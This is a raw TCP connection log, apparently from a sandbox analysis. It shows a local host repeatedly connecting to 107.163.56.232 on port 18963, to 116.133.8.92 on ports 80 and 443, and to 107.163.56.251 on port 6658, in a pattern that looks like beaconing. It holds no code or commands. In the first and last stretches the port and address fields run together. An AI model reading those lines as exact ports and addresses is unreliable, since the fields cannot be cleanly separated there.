                                                                                                                                                                        Dec 19, 2024 15:44:44.090599060 CET8049729116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:44.092068911 CET1896349730107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:45.672321081 CET8049729116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:45.672388077 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:45.678965092 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:45.679007053 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:45.679068089 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:45.692616940 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:45.692656040 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.546588898 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.546735048 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:47.547368050 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.547420979 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:47.713342905 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:47.713377953 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.714451075 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.714556932 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:47.720319033 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:47.735837936 CET4973018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:47.735837936 CET4972818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:47.754435062 CET4973318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:47.763386011 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.873979092 CET1896349733107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:47.874061108 CET4973318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:48.035053015 CET4973318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:48.154565096 CET1896349733107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:48.258068085 CET4973418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:48.377677917 CET1896349734107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:48.377767086 CET4973418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:48.378560066 CET4973418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:48.498056889 CET1896349734107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.185419083 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.185518980 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.185524940 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.185558081 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.185590029 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.185642004 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.185653925 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.185761929 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.217828035 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.217916012 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.217950106 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.217997074 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.218019009 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.218050003 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.230931044 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.230963945 CET44349731116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.230988026 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.231020927 CET49731443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.538954973 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.539362907 CET4973680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.661664009 CET8049729116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.661681890 CET8049736116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:49.661741018 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.661781073 CET4973680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.684655905 CET4973680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:49.805475950 CET8049736116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:51.735631943 CET4973680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:51.735671043 CET4973318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.735763073 CET4973418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.736170053 CET4973718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.856221914 CET1896349737107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:51.856344938 CET4973718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.861542940 CET4973718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.865968943 CET4973818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.867158890 CET4973980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:51.987478971 CET1896349737107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:51.991960049 CET1896349738107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:51.992950916 CET8049739116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:51.993125916 CET4973980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:51.993135929 CET4973818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.993258953 CET4973818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:51.993359089 CET4973980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:52.113106966 CET1896349738107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:52.113198042 CET8049739116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:55.876691103 CET4973718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:55.876728058 CET4973818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:55.876769066 CET4973980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:55.877469063 CET4974018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:55.997936964 CET1896349740107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:55.998008013 CET4974018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:55.998133898 CET4974018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:56.042659044 CET4974118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:56.043706894 CET4974280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:56.120145082 CET1896349740107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:56.163830042 CET1896349741107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:56.163929939 CET4974118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:56.164062023 CET4974118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:56.164145947 CET8049742116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:56.164196014 CET4974280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:56.164269924 CET4974280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:56.283565998 CET1896349741107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:56.283915997 CET8049742116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:57.873430967 CET8049742116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:57.873518944 CET4974280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:58.006002903 CET49743443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:58.006071091 CET44349743116.133.8.92192.168.2.11
Dec 19, 2024 15:44:58.006182909 CET  49743  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:44:58.171061039 CET  49743  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:44:58.171118021 CET  443  49743  116.133.8.92  192.168.2.11
Dec 19, 2024 15:44:58.748452902 CET  6658  49718  107.163.56.251  192.168.2.11
Dec 19, 2024 15:44:58.748617887 CET  49718  6658  192.168.2.11  107.163.56.251
Dec 19, 2024 15:44:58.864900112 CET  49745  6658  192.168.2.11  107.163.56.251
Dec 19, 2024 15:44:58.985594988 CET  6658  49745  107.163.56.251  192.168.2.11
Dec 19, 2024 15:44:58.985666990 CET  49745  6658  192.168.2.11  107.163.56.251
Dec 19, 2024 15:44:58.986252069 CET  49745  6658  192.168.2.11  107.163.56.251
Dec 19, 2024 15:44:59.106630087 CET  6658  49745  107.163.56.251  192.168.2.11
Dec 19, 2024 15:45:00.001261950 CET  49743  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.001276970 CET  49740  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.001292944 CET  49741  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.002334118 CET  49746  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.114377975 CET  49747  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.114633083 CET  49742  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.114847898 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.122132063 CET  18963  49746  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:00.122421026 CET  49746  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.123146057 CET  49746  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.235196114 CET  18963  49747  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:00.235213041 CET  80  49748  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:00.235224962 CET  80  49742  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:00.235260963 CET  49747  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.235295057 CET  49742  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.235308886 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.240134954 CET  49747  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:00.243367910 CET  18963  49746  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:00.256176949 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:00.360061884 CET  18963  49747  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:00.376441956 CET  80  49748  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:02.036578894 CET  80  49748  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:02.039906025 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:02.042395115 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:02.042443037 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:02.042543888 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:02.042793989 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:02.042804003 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:03.970573902 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:03.970650911 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:03.971354961 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:03.971421957 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:03.975466013 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:03.975477934 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:03.975724936 CET  443  49749  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:03.975775957 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:03.976349115 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.001668930 CET  49746  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.001696110 CET  49747  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.001769066 CET  49749  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.002545118 CET  49750  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.115040064 CET  49751  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.116533041 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.116779089 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.122126102 CET  18963  49750  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:04.122195959 CET  49750  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.122564077 CET  49750  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.234925985 CET  18963  49751  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:04.235038996 CET  49751  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.235218048 CET  49751  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:04.236285925 CET  80  49752  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:04.236357927 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.236376047 CET  80  49748  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:04.236432076 CET  49748  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.236861944 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:04.242095947 CET  18963  49750  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:04.354942083 CET  18963  49751  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:04.356379032 CET  80  49752  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:05.974081039 CET  80  49752  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:05.977914095 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:05.980225086 CET  49753  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:05.980262995 CET  443  49753  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:05.981874943 CET  49753  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:05.982116938 CET  49753  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:05.982129097 CET  443  49753  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:08.020762920 CET  49753  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.020764112 CET  49750  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.020792007 CET  49751  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.022562027 CET  49754  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.131123066 CET  49755  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.131643057 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.131860971 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.148371935 CET  18963  49754  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:08.148478031 CET  49754  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.148576021 CET  49754  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.250797987 CET  18963  49755  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:08.250942945 CET  49755  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.251167059 CET  49755  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:08.251543999 CET  80  49756  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:08.251597881 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.251693964 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.251771927 CET  80  49752  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:08.251821041 CET  49752  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:08.268310070 CET  18963  49754  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:08.370815992 CET  18963  49755  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:08.371170044 CET  80  49756  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:09.958744049 CET  80  49756  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:09.958806038 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:10.014695883 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:10.014738083 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:10.014792919 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:10.016031027 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:10.016041040 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:11.914894104 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:11.915170908 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:11.915682077 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:11.915854931 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:11.918890953 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:11.918900013 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:11.919153929 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:11.919285059 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:11.919704914 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:11.967324972 CET  443  49757  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:12.016757011 CET  49754  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.016797066 CET  49755  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.016870022 CET  49757  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.017647982 CET  49758  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.130232096 CET  49759  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.139076948 CET  18963  49758  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:12.139204025 CET  49758  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.139372110 CET  49758  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.143503904 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.143788099 CET  49760  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.249927998 CET  18963  49759  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:12.250027895 CET  49759  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.258850098 CET  18963  49758  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:12.260761976 CET  49759  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:12.263497114 CET  80  49760  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:12.263576984 CET  49760  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.263819933 CET  80  49756  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:12.263871908 CET  49756  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.264594078 CET  49760  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:12.380728006 CET  18963  49759  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:12.384120941 CET  80  49760  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:14.117769003 CET  80  49760  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:14.117836952 CET  49760  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:14.168390036 CET  49761  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:14.168437004 CET  443  49761  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:14.168505907 CET  49761  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:14.168740034 CET  49761  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:14.168757915 CET  443  49761  116.133.8.92  192.168.2.11
Dec 19, 2024 15:45:16.032665014 CET  49759  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.032696962 CET  49758  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.032696962 CET  49761  443  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:16.033297062 CET  49762  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.145051003 CET  49763  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.146867990 CET  49760  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:16.147102118 CET  49764  80  192.168.2.11  116.133.8.92
Dec 19, 2024 15:45:16.153388977 CET  18963  49762  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:16.153474092 CET  49762  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.153583050 CET  49762  18963  192.168.2.11  107.163.56.232
Dec 19, 2024 15:45:16.264580011 CET  18963  49763  107.163.56.232  192.168.2.11
Dec 19, 2024 15:45:16.264782906 CET  49763  18963  192.168.2.11  107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:16.264883041 CET4976318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:16.266572952 CET8049764116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.266658068 CET4976480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:16.266760111 CET8049760116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.266824007 CET4976080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:16.267159939 CET4976480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:16.273319006 CET1896349762107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.384722948 CET1896349763107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.387288094 CET8049764116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.048171997 CET4976218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.048203945 CET4976318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.048222065 CET4976480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.051182032 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.171016932 CET1896349765107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.171106100 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.171262026 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.180697918 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.181297064 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.290837049 CET1896349765107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.300484896 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.300565958 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.300904036 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.301244974 CET1896349767107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.301309109 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.312871933 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.420370102 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.433653116 CET1896349767107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.905200958 CET665849745107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.905294895 CET497456658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.170860052 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.290963888 CET665849769107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:21.291037083 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.291465998 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.410979986 CET665849769107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.017090082 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.017199993 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034096003 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034172058 CET44349770116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.034245968 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034579039 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034591913 CET44349770116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.174267054 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.174361944 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.174361944 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.174952030 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.294574976 CET1896349771107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.294663906 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.294791937 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.349034071 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.350399971 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.350641966 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.414549112 CET1896349771107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.469080925 CET1896349772107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.469244957 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.472295046 CET8049773116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.473217010 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.481132984 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.481162071 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.483217955 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.483411074 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.600698948 CET1896349772107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.600790024 CET8049773116.133.8.92192.168.2.11
